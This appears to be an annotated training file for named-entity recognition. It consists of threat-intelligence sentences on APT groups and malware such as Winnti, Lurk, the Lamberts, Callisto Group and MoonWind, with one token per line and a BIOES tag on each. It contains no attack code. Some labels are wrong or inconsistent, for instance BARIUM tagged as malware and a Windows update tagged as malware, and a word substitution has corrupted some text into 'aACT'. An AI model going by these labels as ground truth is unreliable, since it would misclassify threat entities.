O + +Infy S-MAL +engaged O +in O +malware O +spearphishing S-ACT +against O +the O +same O +targets O +as O +Flying O +Kitten O +from O +the O +outset O +of O +its O +campaign O +; O +Operation B-ACT +Cleaver E-ACT +has O +registered O +several O +resources O +related O +to O +development B-IDTY +agencies E-IDTY +that O +have O +been O +the O +subject O +of O +intrusion O +attempts O +by O +others O +since O +February B-TIME +2014 E-TIME +. O + +The O +malicious O +samples O +we O +found O +are O +the O +early O +stage O +malware O +most O +often O +delivered O +by O +spear-phishing S-ACT +e-mails E-ACT +. O + +This O +next O +stage O +library O +copies O +itself O +into O +the O +System32 O +directory O +of O +the O +Windows S-OS +folder O +after O +the O +hardcoded O +file O +name O +— O +either O +KBDLV2.DLL S-FILE +or O +AUTO.DLL S-FILE +, O +depending O +on O +the O +malware O +sample O +. O + +At O +this O +stage O +, O +the O +malware O +gathers O +information O +about O +the O +infected O +computer O +. O + +Hancom O +Office O +is O +widely O +used O +in O +South S-LOC +Korea S-LOC +. O + +Perhaps O +it O +also O +points O +to O +the O +suspected O +North B-LOC +Korean E-LOC +origin O +of O +attack O +. O + +The O +attacker O +is O +from O +North B-LOC +Korea E-LOC +. O + +All O +of O +them O +lie B-ACT +in I-ACT +ranges E-ACT +of O +the O +Jilin B-LOC +Province I-LOC +Network E-LOC +and O +Liaoning B-LOC +Province I-LOC +Network E-LOC +, O +in O +China S-LOC +. O + +Finally O +, O +this O +geo-location O +supports O +the O +likely O +theory O +that O +the O +attackers O +behind O +Kimsuky S-APT +are O +based O +in O +North B-LOC +Korea E-LOC +. O + +In O +this O +blog O +, O +we O +look O +at O +the O +Winnti S-MAL +malware S-MAL +implant O +as O +used O +by O +two O +known O +activity O +groups O +BARIUM S-APT +and O +LEAD O +. 
O + +According O +to O +the O +German S-LOC +press O +, O +the O +intruders O +used O +the O +Winnti B-MAL +family I-MAL +of I-MAL +malware E-MAL +as O +their O +main O +implant O +, O +giving O +them O +persistent O +access O +to O +the O +conglomerate O +'s O +network O +as O +early O +as O +February B-TIME +2016 E-TIME +. O + +In O +the O +case O +of O +this O +malware O +, O +the O +activity O +groups O +strongly O +associated O +with O +Winnti S-MAL +are O +BARIUM S-MAL +and O +LEAD S-MAL +. O + +But O +even O +though O +they O +share O +the O +use O +of O +Winnti S-MAL +, O +the O +BARIUM S-MAL +and O +LEAD S-MAL +activity O +groups O +are O +involved O +in O +very O +different O +intrusion O +scenarios O +. O + +To O +show O +how O +this O +breach O +and O +similar O +breaches O +can O +be O +mitigated O +, O +we O +look O +at O +how O +Windows B-SECTEAM +Defender I-SECTEAM +ATP E-SECTEAM +flags O +activities S-ACT +associated O +with O +BARIUM S-ACT +, O +LEAD S-ACT +, O +and O +other O +known O +activity O +groups O +and O +how O +it O +provides O +extensive O +threat O +intelligence O +about O +these O +groups O +. O + +BARIUM S-ACT +begins O +its O +attacks O +by O +cultivating O +relationships O +with O +potential O +victims—particularly O +those O +working O +in O +Business O +Development O +or O +Human O +Resources—on O +various O +social B-IDTY +media E-IDTY +platforms O +. O + +During O +these O +intrusions O +, O +LEAD O +'s O +objective O +was O +to O +steal O +sensitive O +data O +, O +including O +research O +materials O +, O +process O +documents O +, O +and O +project O +plans O +. O + +Initial O +intrusion O +stages O +feature O +the O +Win32/Barlaiy S-MAL +implant—notable O +for O +its O +use O +of O +social O +network O +profiles O +, O +collaborative O +document O +editing O +sites O +, O +and O +blogs O +for O +C&C S-TOOL +. 
O + +Once O +BARIUM S-ACT +has O +established O +rapport O +, O +they O +spear-phish S-ACT +the O +victim O +using O +a O +variety O +of O +unsophisticated O +malware S-MAL +installation O +vectors O +, O +including O +malicious O +shortcut O +( O +.lnk S-FILE +) O +files O +with O +hidden O +payloads O +. O + +Instead O +, O +the O +group O +often O +simply O +emails S-TOOL +a O +Winnti B-MAL +installer E-MAL +to O +potential O +victims O +, O +relying O +on O +basic O +social B-ACT +engineering I-ACT +tactics E-ACT +to O +convince O +recipients O +to O +run O +the O +attached O +malware O +. O + +Microsoft B-SECTEAM +Analytics E-SECTEAM +shows O +that O +Winnti S-MAL +has O +been O +used O +in O +intrusions O +carried O +out O +throughout O +Asia S-LOC +, O +Europe S-LOC +, O +Oceania S-LOC +, O +the O +Middle B-LOC +East E-LOC +, O +and O +the O +United B-LOC +States E-LOC +in O +the O +last O +six O +months O +( O +Figure O +1 O +) O +. O + +Instead O +, O +Lead O +often O +simply O +emails S-TOOL +a O +Winnti B-MAL +installer E-MAL +to O +potential O +victims O +, O +relying O +on O +basic O +social B-ACT +engineering I-ACT +tactics E-ACT +to O +convince O +recipients O +to O +run O +the O +attached O +malware O +. O + +In O +some O +other O +cases O +, O +LEAD O +gains O +access O +to O +a O +target O +by O +brute-forcing O +remote O +access O +login O +credentials O +, O +performing O +SQL O +injection O +, O +or O +exploiting O +unpatched O +web O +servers O +, O +and O +then O +they O +copy O +the O +Winnti B-MAL +installer E-MAL +directly O +to O +compromised O +machines O +. O + +This O +was O +the O +case O +in O +two O +known O +intrusions O +in O +2015 S-TIME +, O +where O +attackers O +named O +the O +implant O +DLL S-TOOL +" O +ASPNET_FILTER.DLL S-FILE +" O +to O +disguise O +it O +as O +the O +DLL S-TOOL +for O +the O +ASP.NET B-FILE +ISAPI I-FILE +Filter E-FILE +. 
O + +Windows B-SECTEAM +Defender I-SECTEAM +ATP E-SECTEAM +helps O +network O +security O +professionals O +deal O +with O +intrusions O +from O +activity O +groups O +like O +LEAD S-MAL +and O +BARIUM S-MAL +in O +several O +ACTs O +. O + +The O +following O +examples O +were O +developed O +using O +a O +Winnti B-MAL +installer E-MAL +that O +was O +used O +in O +attacks O +in O +December B-TIME +2016 E-TIME +. O + +The O +Windows B-MAL +10 I-MAL +Creators I-MAL +Update E-MAL +will O +bring O +several O +enhancements O +to O +Windows B-SECTEAM +Defender I-SECTEAM +ATP E-SECTEAM +that O +will O +provide O +SOC B-IDTY +personnel E-IDTY +with O +options O +for O +immediate O +mitigation O +of O +a O +detected O +threat O +. O + +LEAD O +and O +Barium S-APT +are O +not O +known O +for O +large-scale O +spear-phishing S-ACT +, O +so O +it O +is O +unlikely O +that O +SOC B-IDTY +personnel E-IDTY +would O +have O +to O +deal O +with O +multiple O +machines O +having O +been O +compromised O +by O +these O +groups O +at O +the O +same O +time O +. O + +And O +, O +finally O +, O +with O +the O +upcoming O +Creators B-MAL +Update E-MAL +, O +Windows B-SECTEAM +Defender I-SECTEAM +ATP E-SECTEAM +will O +provide O +additional O +capabilities O +for O +detecting O +threats O +such O +as O +Winnti S-MAL +, O +as O +well O +as O +centralized O +response O +options O +, O +such O +as O +machine O +isolation O +and O +file O +blocking O +, O +that O +will O +enable O +fast O +containment O +of O +known O +attack O +jump O +off O +points O +. O + +The O +police O +suspected O +Lurk S-MAL +of O +stealing O +nearly O +three O +billion O +rubles O +, O +using O +malicious O +software O +to O +systematically O +withdraw O +large O +sums O +of O +money O +from O +the O +accounts O +of O +commercial B-IDTY +organizations E-IDTY +, O +including O +banks S-IDTY +. 
O + +When O +we O +first O +encountered O +Lurk S-MAL +, O +in O +2011 S-TIME +, O +it O +was O +a O +nameless O +Trojan S-MAL +. O + +While O +the O +machine O +is O +in O +isolation O +, O +SOC B-IDTY +personnel E-IDTY +can O +direct O +the O +infected O +machine O +to O +collect O +live O +investigation O +data O +, O +such O +as O +the O +DNS S-PROT +cache O +or O +security O +event O +logs O +, O +which O +they O +can O +use O +to O +verify O +alerts O +, O +assess O +the O +state O +of O +the O +intrusion O +, O +and O +support O +follow-up O +actions O +. O + +This O +article O +is O +an O +attempt O +to O +share O +this O +experience O +with O +other O +experts O +, O +particularly O +the O +IT S-IDTY +security O +specialists O +in O +companies O +and O +financial B-IDTY +institutions E-IDTY +that O +increasingly O +find O +themselves O +the O +targets O +of O +cyber-attacks O +. O + +In O +most O +cases O +, O +the O +attackers O +only O +had O +to O +infect O +the O +computer O +on O +which O +the O +RBS O +software O +was O +installed O +in O +order O +to O +start O +stealing O +the O +cash O +. O + +We O +were O +soon O +able O +to O +help O +investigate O +another O +incident O +involving O +Lurk S-MAL +. O + +This O +event O +significantly O +affected O +the O +Russian B-LOC +cybercriminal E-LOC +world O +as O +the O +gang O +had O +stolen O +hundreds O +of O +millions O +of O +rubles O +during O +a O +few O +years O +of O +activity O +, O +and O +was O +considered O +a O +" O +leader O +" O +among O +cybercriminals O +. O + +In O +Russia O +, O +there O +were O +several O +relatively O +large O +cybercriminal O +groups O +engaged O +in O +financial O +theft O +via O +attacks O +on O +RBS O +. 
O + +In O +April B-TIME +2013 E-TIME +, O +a O +year O +after O +we O +found O +the O +" O +bodiless O +" O +Lurk B-MAL +module E-MAL +, O +the O +Russian O +cybercriminal O +underground O +exploited O +several O +families O +of O +malicious O +software O +that O +specialized O +in O +attacks O +on O +banking O +software O +. O + +Through O +the O +information O +exchanges O +used O +by O +people O +in O +the O +security B-IDTY +industry E-IDTY +, O +we O +learned O +that O +several O +Russian O +banks S-IDTY +were O +struggling O +with O +malicious O +programs O +created O +specifically O +to O +attack O +a O +particular O +type O +of O +legal O +banking O +software O +. O + +If O +it O +did O +, O +the O +malware O +downloaded O +additional O +modules O +, O +including O +ones O +allowing O +for O +the O +automatic O +creation O +of O +unauthorized O +payment O +orders O +, O +changing O +details O +in O +legal O +payment O +orders O +, O +etc O +. O + +As O +far O +as O +we O +can O +judge O +from O +the O +data O +we O +have O +, O +in O +2014 S-TIME +the O +criminal O +group O +behind O +Lurk S-MAL +seriously O +reduced O +its O +activity O +and O +" O +lived O +from O +hand O +to O +mouth O +" O +, O +attacking O +anyone O +they O +could O +, O +including O +ordinary O +users O +. O + +In O +February B-TIME +2015 E-TIME +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +Global O +Research O +and O +Analysis O +Team O +( O +GReAT S-SECTEAM +) O +released O +its O +research O +into O +the O +Carbanak B-ACT +campaign E-ACT +targeting O +financial B-IDTY +institutions E-IDTY +. O + +Since O +2011 S-TIME +, O +the O +robbers O +had O +allegedly O +been O +stealing O +money O +directly O +from O +bank O +accounts O +in O +Russia S-LOC +and O +other O +countries O +of O +the O +Commonwealth O +of O +Independent O +States O +( O +CIS O +) O +by O +using O +a O +Trojan S-MAL +called O +Lurk S-MAL +. 
O + +which O +they O +launched O +targeted B-ACT +attacks E-ACT +against O +Russian S-LOC +banks S-IDTY +, O +businesses S-IDTY +and O +media B-IDTY +companies E-IDTY +. O + +Lurk S-MAL +uses O +a O +form O +of O +steganography O +: O +that's O +where O +one O +file O +is O +hidden O +aACT O +inside O +another O +file O +of O +a O +completely O +different O +sort O +, O +such O +as O +an O +image O +, O +audio O +, O +or O +video O +file O +. O + +The O +latest O +version O +of O +Madi O +also O +has O +the O +ability O +to O +monitor O +the O +Russian S-LOC +social O +network O +Vkontakte O +( O +VK O +) O +along O +with O +the O +Jabber O +messaging O +platform O +to O +look O +for O +users O +who O +visit O +websites O +that O +contain O +words O +like O +" O +USA O +" O +, O +" O +Skype O +" O +, O +and O +" O +gov O +" O +. O + +Madi O +was O +found O +capturing O +computer O +screens O +, O +recording O +audio O +and O +stealing O +screenshots O +, O +keystrokes O +, O +documents O +and O +e-mail S-TOOL +correspondence O +from O +" O +Middle O +Eastern O +critical B-IDTY +infrastructure I-IDTY +engineering I-IDTY +firms E-IDTY +, O +government B-IDTY +agencies E-IDTY +, O +financial B-IDTY +houses E-IDTY +and O +academia S-IDTY +. O + +A O +timeline O +of O +new O +activity O +can O +be O +scoped O +out O +for O +the O +group O +, O +with O +the O +greatest O +number O +of O +related O +downloaders O +created O +by O +the O +developers O +in O +December B-TIME +2011 E-TIME +, O +Feb S-TIME +and O +March B-TIME +of I-TIME +2012 E-TIME +, O +followed O +by O +June B-TIME +of I-TIME +2012 E-TIME +. O + +it O +reports O +to O +was O +created O +on O +August B-TIME +10 E-TIME +, O +2011 S-TIME +. O + +Since O +at O +least O +2008 S-TIME +, O +The O +Lamberts S-MAL +have O +used O +multiple O +sophisticated O +attack O +tools O +against O +high-profile O +victims O +. 
O + +Longhorn O +, O +which O +we O +internally O +refer O +to O +as O +" O +The B-APT +Lamberts E-APT +" O +, O +first O +came O +to O +the O +attention O +of O +the O +ITSec B-SECTEAM +community E-SECTEAM +in O +2014 S-TIME +, O +when O +our O +colleagues O +from O +FireEye S-SECTEAM +discovered O +an O +attack O +using O +a O +zero B-VULNAME +day E-VULNAME +vulnerability S-VULNAME +( O +CVE-2014-4148 S-VULID +) O +. O + +The O +attack O +leveraged O +malware O +we O +called O +' O +BlackLambert S-MAL +' O +, O +which O +was O +used O +to O +target O +a O +high B-IDTY +profile I-IDTY +organization E-IDTY +in O +Europe S-LOC +. O + +Their O +arsenal O +includes O +network-driven B-MAL +backdoors E-MAL +, O +several O +generations O +of O +modular B-MAL +backdoors E-MAL +, O +harvesting B-MAL +tools E-MAL +, O +and O +wipers S-MAL +. O + +The O +first O +time O +the O +Lambert B-MAL +family I-MAL +malware E-MAL +was O +uncovered O +publicly O +was O +in O +October B-TIME +2014 E-TIME +, O +when O +FireEye S-SECTEAM +posted O +a O +blog O +about O +a O +zero B-VULNAME +day E-VULNAME +exploit S-VULNAME +( O +CVE-2014-4148 S-VULID +) O +used O +in O +the O +wild O +. O + +Interestingly O +, O +while O +most O +Blue B-MAL +Lambert E-MAL +variants O +have O +version O +numbers O +in O +the O +range O +of O +2.x O +, O +Green B-MAL +Lambert E-MAL +is O +mostly O +in O +3.x O +versions O +. O + +While O +investigating O +one O +of O +these O +infections O +involving O +White B-MAL +Lambert E-MAL +( O +network-driven O +implant O +) O +and O +Blue B-MAL +Lambert E-MAL +( O +active O +implant O +) O +, O +we O +found O +yet O +another O +family O +of O +tools O +that O +appear O +to O +be O +related O +. 
O + +Versions O +of O +this O +particular O +orchestrator O +were O +found O +on O +other O +victims O +, O +together O +with O +White B-MAL +Lambert I-MAL +samples E-MAL +, O +indicating O +a O +close O +relationship O +between O +the O +White S-MAL +and O +Pink B-MAL +Lambert I-MAL +malware I-MAL +families E-MAL +. O + +While O +in O +most O +cases O +the O +infection O +vector O +remains O +unknown O +, O +the O +high B-ACT +profile I-ACT +attack E-ACT +from O +2014 S-TIME +used O +a O +very O +complex O +Windows S-OS +TTF O +zero-day S-VULNAME +exploit S-VULNAME +( O +CVE-2014-4148 S-VULID +) O +. O + +This O +migration B-ACT +activity E-ACT +was O +last O +observed O +in O +October B-TIME +2016 E-TIME +. O + +Most O +of O +the O +Blue B-MAL +and I-MAL +Green I-MAL +Lambert I-MAL +samples E-MAL +have O +two O +C&C S-TOOL +servers O +hardcoded O +in O +their O +configuration O +block O +: O +a O +hostname O +and O +an O +IP S-PROT +address O +. O + +Some O +of O +the O +known O +filenames O +for O +Gray B-MAL +Lambert E-MAL +are O +mwapi32.dll S-MAL +and O +poolstr.dll S-MAL +– O +it O +should O +be O +pointed O +though O +that O +the O +filenames O +used O +by O +the O +Lamberts S-MAL +are O +generally O +unique O +and O +have O +never O +been O +used O +twice O +. O + +Black B-MAL +Lambert E-MAL +was O +seen O +only O +briefly O +and O +we O +assume O +it O +was O +" O +retired O +" O +from O +the O +arsenal O +after O +being O +discovered O +by O +FireEye S-SECTEAM +in O +2014 S-TIME +. O + +The O +Lamberts B-MAL +toolkit E-MAL +spans O +across O +several O +years O +, O +with O +most O +activity O +occurring O +in O +2013 S-TIME +and O +2014 S-TIME +. 
O + +To O +further O +exemplify O +the O +proficiency O +of O +the O +attackers O +leveraging O +the O +Lamberts B-MAL +toolkit E-MAL +, O +deployment O +of O +Black B-MAL +Lambert E-MAL +included O +a O +rather O +sophisticated O +TTF O +zero B-VULNAME +day E-VULNAME +exploit S-VULNAME +, O +CVE-2014-4148 S-VULID +. O + +Taking O +that O +into O +account O +, O +we O +classify O +the O +Lamberts S-MAL +as O +the O +same O +level O +of O +complexity O +as O +Regin S-MAL +, O +ProjectSauron S-MAL +, O +Equation S-MAL +and O +Duqu2 S-MAL +, O +which O +makes O +them O +one O +of O +the O +most O +sophisticated O +Cyber B-ACT +Espionage E-ACT +toolkits O +we O +have O +ever O +analysed O +. O + +Taking O +that O +into O +account O +, O +we O +classify O +the O +Lamberts S-MAL +as O +the O +same O +level O +of O +complexity O +as O +Regin S-MAL +, O +ProjectSauron S-MAL +, O +Equation S-MAL +and O +Duqu2 S-MAL +, O +which O +makes O +them O +one O +of O +the O +most O +sophisticated O +Cyber B-ACT +Espionage E-ACT +toolkits O +we O +have O +ever O +analysed O +. O + +On O +January B-TIME +15 E-TIME +, O +Confiant O +exposed O +the O +activity O +of O +the O +Zirconium O +group O +, O +spreading O +malicious O +ads O +via O +a O +network O +of O +fake B-IDTY +ad I-IDTY +agencies E-IDTY +through O +2017 S-TIME +, O +in O +what O +amounted O +to O +the O +largest O +malvertising O +campaign O +of O +recent O +times O +. O + +Cadelle O +, O +uses O +Backdoor.Cadelspy S-MAL +. O + +Symantec S-SECTEAM +telemetry O +identified O +Cadelle O +and O +Chafer B-ACT +activity E-ACT +dating O +from O +as O +far O +back O +as O +July B-TIME +2014 E-TIME +, O +however O +, O +it's O +likely O +that O +activity O +began O +well O +before O +this O +date O +. O + +Chafer O +, O +uses O +Backdoor.Remexi S-MAL +. O + +Cadelle O +'s O +threats O +are O +capable O +of O +opening O +a O +back O +door O +and O +stealing O +information O +from O +victims' O +computers O +. 
O + +Chafer O +, O +uses O +Backdoor.Remexi.B S-MAL +. O + +registrant O +information O +points O +to O +activity O +possibly O +as O +early O +as O +2011 S-TIME +. O + +These O +threats O +are O +capable O +of O +opening O +a O +back O +door O +and O +stealing O +information O +from O +victims' O +computers O +. O + +executable O +compilation O +times O +suggest O +early O +2012 S-TIME +. O + +It's O +unclear O +how O +Cadelle O +infects O +its O +targets O +with O +Backdoor.Cadelspy S-MAL +. O + +The O +affected O +organizations O +we O +were O +able O +to O +identify O +are O +mostly O +based O +in O +the O +Middle B-LOC +East E-LOC +. O + +one O +organization O +is O +located O +in O +the O +US S-LOC +. O + +There O +are O +a O +number O +of O +factors O +in O +these O +groups' O +campaigns S-ACT +that O +suggests O +that O +the O +attackers O +may O +be O +based O +in O +Iran S-LOC +. O + +Remexi S-MAL +is O +a O +basic O +back O +door O +Trojan S-MAL +that O +allows O +attackers O +to O +open O +a O +remote O +shell O +on O +the O +computer O +and O +execute O +commands O +. O + +Their O +primary O +interest O +appears O +to O +be O +gathering O +intelligence O +. O + +This O +stands O +in O +opposition O +to O +the O +data O +gathered O +from O +export O +timestamps O +and O +C&C B-ACT +domain I-ACT +activity E-ACT +that O +points O +to O +Green B-MAL +Lambert E-MAL +being O +considerably O +older O +than O +the O +Blue S-MAL +variant O +. O + +security O +policy O +in O +the O +Eastern S-LOC +Europe S-LOC +and O +South O +Caucasus O +regions O +. O + +Callisto O +Group O +via O +credential O +phishingThese O +spear B-ACT +phishing E-ACT +emails S-TOOL +were O +crafted O +to O +appear O +highly O +convincing O +, O +including O +being O +sent O +from O +legitimate O +email S-TOOL +accounts O +suspected O +to O +have O +been O +previously O +compromised O +by O +the O +Callisto O +Group O +via O +credential O +phishing S-ACT +. 
O + +In O +early O +2016 S-TIME +the O +Callisto O +Group O +began O +sending O +highly O +targeted O +spear B-ACT +phishing E-ACT +emails S-TOOL +with O +malicious B-FILE +attachments E-FILE +that O +contained O +, O +as O +their O +final O +payload O +, O +the O +" O +Scout S-MAL +" O +malware O +tool O +from O +the O +HackingTeam O +RCS O +Galileo O +platform O +. O + +These O +spear B-ACT +phishing E-ACT +emails S-TOOL +were O +crafted O +to O +appear O +highly O +convincing O +, O +including O +being O +sent O +from O +legitimate O +email S-TOOL +accounts O +suspected O +to O +have O +been O +previously O +compromised O +by O +the O +Callisto O +Group O +via O +credential O +phishing S-ACT +. O + +Callisto O +Group O +appears O +to O +be O +intelligence O +gathering O +related O +to O +European O +foreign O +and O +security O +policy O +. O + +some O +indications O +of O +loosely O +linked O +activity O +dating O +back O +to O +at O +least O +2013 S-TIME +. O + +In O +October B-TIME +2015 E-TIME +, O +the O +Callisto B-APT +Group E-APT +was O +observed O +sending O +targeted O +credential O +phishing B-ACT +emails S-TOOL +. O + +In O +early O +2016 S-TIME +, O +the O +Callisto O +Group O +was O +observed O +sending O +targeted O +spear B-ACT +phishing E-ACT +emails S-TOOL +. O + +The O +malicious B-FILE +attachments E-FILE +purported O +to O +be O +invitations S-MAL +or O +drafts B-MAL +of I-MAL +the I-MAL +agenda E-MAL +for O +the O +conference O +. O + +Based O +on O +our O +analysis O +of O +Callisto B-APT +Group E-APT +'s O +usage O +of O +RCS O +Galileo O +, O +we O +believe O +the O +Callisto O +Group O +did O +not O +utilize O +the O +leaked O +RCS O +Galileo O +source O +code O +, O +but O +rather O +used O +the O +leaked O +readymade O +installers S-MAL +to O +set O +up O +their O +own O +installation O +of O +the O +RCS O +Galileo O +platform O +. 
O + +In O +the O +known O +spear B-ACT +phishing I-ACT +attacks E-ACT +by O +the O +Callisto B-APT +Group E-APT +, O +they O +employed O +the O +" O +Scout S-MAL +" O +malware O +tool O +from O +the O +RCS O +Galileo S-APT +platform O +. O + +We O +are O +confident O +the O +Callisto O +Group O +used O +this O +type O +of O +access O +to O +a O +target O +'s O +email S-TOOL +account O +for O +the O +purposes O +of O +sending O +spear B-ACT +phishing E-ACT +to O +other O +targets O +. O + +If O +a O +target O +of O +the O +spear B-ACT +phishing E-ACT +described O +in O +" O +Phase O +2 O +: O +malware O +deployment O +" O +opened O +the O +email B-ACT +attachment E-ACT +and O +, O +crucially O +, O +clicked O +on O +the O +icon O +in O +the O +attachment O +, O +this O +would O +lead O +to O +the O +target O +'s O +computer O +becoming O +infected O +with O +the O +" O +Scout S-MAL +" O +malware O +tool O +from O +the O +RCS O +Galileo O +platform O +. O + +Callisto O +Group O +and O +related O +infrastructure O +contain O +links O +to O +at O +least O +Russia S-LOC +, O +Ukraine S-LOC +, O +and O +China S-LOC +. O + +they O +have O +been O +last O +known O +to O +employ O +malware O +in O +February B-TIME +2016 E-TIME +. O + +RCS O +Galileo O +platform O +. O + +The O +spear B-ACT +phishing E-ACT +emails S-TOOL +used O +in O +the O +known O +attacks O +by O +the O +Callisto B-APT +Group E-APT +were O +so O +convincing O +that O +even O +skilled O +and O +alert O +users O +would O +likely O +have O +attempted O +to O +open O +the O +malicious O +attachment O +. O + +In O +October B-TIME +2015 E-TIME +the O +Callisto O +Group O +targeted O +a O +handful O +of O +individuals O +with O +phishing B-ACT +emails S-TOOL +that O +attempted O +to O +obtain O +the O +target O +'s O +webmail O +credentials O +. 
O + +The O +Callisto O +Group O +has O +been O +active O +at O +least O +since O +late O +2015 S-TIME +and O +continues O +to O +be O +so O +, O +including O +continuing O +to O +set O +up O +new O +phishing B-ACT +infrastructure E-ACT +every O +week O +. O + +Called O +Greenbug O +, O +this O +group O +is O +believed O +to O +be O +instrumental O +in O +helping O +Shamoon O +steal O +user O +credentials O +of O +targets O +ahead O +of O +Shamoon O +'s O +destructive B-ACT +attacks E-ACT +. O + +On O +Tuesday S-TIME +, O +Arbor B-SECTEAM +Networks E-SECTEAM +said O +that O +it O +has O +new O +leads O +on O +a O +credential O +stealing O +remote O +access O +Trojan S-MAL +( O +RAT S-MAL +) O +called O +Ismdoor S-MAL +, O +possibly O +used O +by O +Greenbug O +to O +steal O +credentials O +on O +Shamoon O +'s O +behalf O +. O + +" O +With O +our O +latest O +research O +we O +now O +see O +how O +Greenbug O +has O +shifted O +aACT O +from O +HTTP-based O +C2 S-TOOL +communication O +with O +Ismdoor S-MAL +. O + +It's O +now O +relying O +on O +a O +new O +DNS-based B-MAL +attack I-MAL +technique E-MAL +to O +better O +cloak O +command O +and O +control O +communications O +between O +Greenbug O +and O +the O +malware O +" O +, O +said O +Dennis O +Schwarz O +, O +research O +analyst O +on O +Arbor B-SECTEAM +'s I-SECTEAM +ASERT I-SECTEAM +Team E-SECTEAM +, O +in O +an O +interview O +with O +Threatpost O +. O + +t's O +now O +relying O +on O +a O +new O +DNS-based B-MAL +attack I-MAL +technique E-MAL +to O +better O +cloak O +command O +and O +control O +communications O +between O +Greenbug O +and O +the O +malware O +" O +, O +said O +Dennis O +Schwarz O +, O +research O +analyst O +on O +Arbor B-SECTEAM +'s I-SECTEAM +ASERT I-SECTEAM +Team E-SECTEAM +, O +in O +an O +interview O +with O +Threatpost O +. 
O + +By O +relying O +on O +a O +native O +PDF B-ACT +command E-ACT +to O +navigate O +to O +a O +new O +URL S-ACT +, O +Zirconium O +successfully O +circumvented O +Chrome O +'s O +anti-redirect O +protection O +. O + +In O +the O +context O +of O +the O +Ismdoor B-MAL +RAT E-MAL +, O +the O +DNS B-ACT +attack E-ACT +technique O +is O +used O +primarily O +by O +Greenbug O +for O +stealing O +credentials O +. O + +To O +do O +this O +, O +it O +employs O +a O +number O +of O +specific O +commands O +via O +DNSMessenger S-MAL +. O + +Iranian O +Threat O +Agent O +Greenbug O +has O +been O +registering O +domains O +similar O +to O +those O +of O +Israeli O +High-Tech S-IDTY +and O +Cyber B-IDTY +Security I-IDTY +Companies E-IDTY +. O + +By O +pivoting O +off O +the O +registration O +details O +and O +servers O +data O +of O +the O +two O +domains O +we O +discovered O +others O +registered O +by O +the O +threat O +agent O +. O + +Named O +Trochilus S-MAL +, O +this O +new O +RAT S-MAL +was O +part O +of O +Group O +27 O +'s O +malware O +portfolio O +that O +included O +six O +other O +malware O +strains O +, O +all O +served O +together O +or O +in O +different O +combinations O +, O +based O +on O +the O +data O +that O +needed O +to O +be O +stolen O +from O +each O +victim O +. O + +According O +to O +the O +security O +experts O +, O +this O +collection O +of O +malware O +was O +discovered O +after O +their O +first O +initial O +report O +was O +published O +, O +meaning O +that O +Group O +27 O +ignored O +the O +fact O +they O +were O +unmasked O +and O +continued O +to O +infect O +their O +targets O +regardless O +, O +through O +the O +same O +entry O +point O +, O +the O +Myanmar B-IDTY +Union I-IDTY +Election I-IDTY +Commission E-IDTY +( O +UEC S-IDTY +) O +website O +. O + +Trochilus B-ACT +RAT I-ACT +activity E-ACT +was O +discovered O +during O +both O +months O +of O +October O +and O +November B-TIME +2015 E-TIME +. 
O + +From O +September B-TIME +2016 E-TIME +through O +late O +November B-TIME +2016 E-TIME +, O +a O +threat O +actor O +group O +used O +both O +the O +Trochilus B-MAL +RAT E-MAL +and O +a O +newly O +idenfied O +RAT S-MAL +we've O +named O +MoonWind S-MAL +to O +target O +organizations O +in O +Thailand O +, O +including O +a O +utility B-IDTY +organization E-IDTY +. O + +We O +chose O +the O +name O +' O +MoonWind S-MAL +' O +based O +on O +debugging O +strings O +we O +saw O +within O +the O +samples O +, O +as O +well O +as O +the O +compiler O +used O +to O +generate O +the O +samples O +. O + +The O +attackers O +compromised O +two O +legitimate B-MAL +Thai I-MAL +websites E-MAL +to O +host O +the O +malware O +, O +which O +is O +a O +tactic O +this O +group O +has O +used O +in O +the O +past O +. O + +Both O +the O +Trochilus S-MAL +and O +MoonWind B-MAL +RATs E-MAL +were O +hosted O +on O +the O +same O +compromised O +sites O +and O +used O +to O +target O +the O +same O +organization O +at O +the O +same O +time O +. O + +The O +attackers O +used O +different O +command B-MAL +and I-MAL +control I-MAL +servers E-MAL +( O +C2s O +) O +for O +each O +malware O +family O +, O +a O +tactic O +we O +believe O +was O +meant O +to O +thwart O +attempts O +to O +tie O +the O +attacks O +together O +using O +infrastructure O +alone O +. O + +Further O +research O +led O +us O +to O +additional O +MoonWind B-MAL +samples E-MAL +using O +the O +same O +C2 S-TOOL +( O +dns.webswindows.com O +) O +but O +hosted O +on O +a O +different O +compromised O +but O +legitimate B-MAL +website E-MAL +. O + +The O +attacks O +in O +that O +case O +took O +place O +in O +late O +September O +to O +early O +October B-TIME +2016 E-TIME +and O +the O +attackers O +stored O +the O +MoonWind B-MAL +samples E-MAL +as O +RAR B-MAL +files E-MAL +, O +while O +in O +the O +November B-ACT +attacks E-ACT +the O +RATs S-MAL +were O +stored O +as O +executables O +. 
O + +We O +were O +not O +able O +to O +find O +additional O +tools O +, O +but O +the O +attackers O +again O +compromised O +a O +legitimate O +Thai O +website O +to O +host O +their O +malware O +, O +in O +this O +case O +the O +student O +portal O +for O +a O +Thai O +University O +. O + +Trochilus S-MAL +was O +first O +reported O +by O +Arbor B-SECTEAM +Networks E-SECTEAM +in O +their O +Seven O +Pointed O +Dagger O +report O +tying O +its O +use O +to O +other O +targeted O +Southeast B-LOC +Asia I-LOC +activity E-LOC +. O + +The O +activity O +dates O +to O +at O +least O +2013 S-TIME +and O +has O +ties O +to O +multiple O +reports O +by O +other O +researchers O +. O + +It O +is O +highly O +likely O +MoonWind S-MAL +is O +yet O +another O +new O +tool O +being O +used O +by O +the O +group O +or O +groups O +responsible O +for O +that O +activity O +, O +indicating O +they O +are O +not O +only O +still O +active O +but O +continuing O +to O +evolve O +their O +playbook O +. O + +The O +samples O +provided O +were O +alleged O +to O +be O +targeting O +Tibetan S-LOC +and O +Chinese B-LOC +Pro-Democracy I-IDTY +Activists E-IDTY +. O + +On O +June B-TIME +7 E-TIME +, O +2013 S-TIME +, O +Rapid7 S-SECTEAM +released O +an O +analysis O +of O +malware O +dubbed O +' O +KeyBoy S-MAL +' O +, O +also O +exploiting O +unknown O +vulnerabilities O +in O +Microsoft S-IDTY +Office O +, O +similarly O +patched O +by O +MS12-060 S-MAL +, O +but O +allegedly O +targeting O +interests O +in O +Vietnam S-LOC +and O +India S-LOC +. O + +As O +we O +have O +seen O +in O +some O +previous O +targeted B-ACT +malware I-ACT +attacks E-ACT +, O +the O +attackers O +in O +this O +incident O +are O +taking O +advantage O +of O +services O +like O +changeIP +. O + +com O +to O +establish O +free O +subdomains O +in O +their O +infrastructure O +. 
